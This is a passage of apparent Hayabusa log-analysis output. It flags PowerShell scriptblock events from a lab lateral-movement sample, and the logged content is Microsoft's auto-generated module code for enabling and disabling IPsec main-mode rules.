[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [Validate",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"NotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 
'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject'))",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"NotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
